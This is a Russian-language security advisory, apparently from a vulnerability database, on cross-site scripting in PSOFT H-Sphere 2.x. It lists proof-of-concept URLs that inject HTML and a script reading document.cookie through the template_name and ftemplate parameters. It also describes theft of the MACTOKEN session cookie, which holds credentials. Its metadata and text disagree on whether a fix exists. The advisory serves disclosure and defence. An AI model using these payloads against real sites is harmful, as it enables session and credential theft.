Межсайтовый скриптинг в H-Sphere

Дата публикации:
16.06.2003
Дата изменения:
09.03.2009
Всего просмотров:
1080
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
H-Sphere 2.x
Описание: Несколько уязвимостей в проверке правильности ввода обнаружены в H-Sphere. Удаленный пользователь может выполнить XSS нападение.

Если система включения шаблона попытается включить страницу, которая не существует, то онf отобразит путь несуществующей страницы, не фильтруя HTML код в данных, обеспеченных пользователем. Пример:

http://[TARGET]/[PATH TO PSOFT H-SPHERE
INSTALLATION]/servlet/psoft.hsphere.CP/[VALID AND LOGGED USER]/[ID]/[PATH OF
H-SPHERE USER SCRIPTS]/servlet/psoft.hsphere.CP?template_name=[HERE COMES
YOUR CODE]
Согласно сообщению, удаленный пользователь может украсть 'MACTOKEN' целевого пользователя, который содержит имя пользователя, пароль, ID сессии в следующем формате:
 
MACTOKEN=[USER]|0000000xxxxxx|0xxxxx0000xxxx0000xxxx0000xxxx00
Пример: http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND
XSS]&amp;requestURL=&quot;&gt;</PRE>
<h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&
password=[PASSWORD]

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<H1>xss</H1>

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USER NAME]/[ID]/psoft.hsphere.CP?template
_name=<IFRAME>

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<h1> XSS

http://[TARGET]/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<script>alert(document.cookie);</script>
Уязвимость обнаружена в H-Sphere 2.3.x

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: PSOFT H-Sphere Cross Site Scripting Vulnerabilities

или введите имя

CAPTCHA